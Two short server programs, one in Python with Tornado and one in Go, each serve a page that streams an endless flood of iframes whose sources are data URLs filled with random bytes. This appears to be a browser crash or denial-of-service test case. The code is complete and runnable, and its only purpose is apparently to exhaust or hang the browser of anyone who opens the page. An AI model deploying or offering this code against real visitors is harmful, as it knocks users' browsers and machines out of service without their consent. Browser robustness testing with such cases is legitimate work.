File: iframe_001/main.py
// Send infinite data-URL iframes.

from os import urandom
from base64 import b64encode
from tornado import ioloop
from tornado import web

class IndexHandler(web.RequestHandler):
    @web.asynchronous
    def get(self):
        while True:
            for i in range(100):
                self.write('<iframe src="data:application/octet-stream;base64,')
                self.write(b64encode(urandom(16)))
                self.write('"></iframe>')
            self.flush()

app = web.Application([(r'/', IndexHandler)])

if __name__ == "__main__":
    app.listen(8080)
    ioloop.IOLoop.current().start()

File: iframe_001/main.go
// Send infinite data-URL iframes.

package main

import (
	"encoding/base64"
	"math/rand"
	"net/http"
)

func main() {
	http.HandleFunc("/", flood)
	http.ListenAndServe(":8080", nil)
}

func flood(w http.ResponseWriter, r *http.Request) {
	w.Header().Set("Content-Type", "text/html; charset=utf-8")
	flusher, ok := w.(http.Flusher)
	if !ok {
		return
	}
	data := make([]byte, 16)
	head := []byte("<iframe src=\"data:application/octet-stream;base64,")
	foot := []byte("\"></iframe>")
	for {
		for i := 0; i < 100; i++ {
			_, err := w.Write(head)
			if err != nil {
				return
			}
			rand.Read(data)
			encoder := base64.NewEncoder(base64.StdEncoding, w)
			_, err = encoder.Write(data)
			if err != nil {
				return
			}
			encoder.Close()
			_, err = w.Write(foot)
			if err != nil {
				return
			}
		}
		flusher.Flush()
	}
}
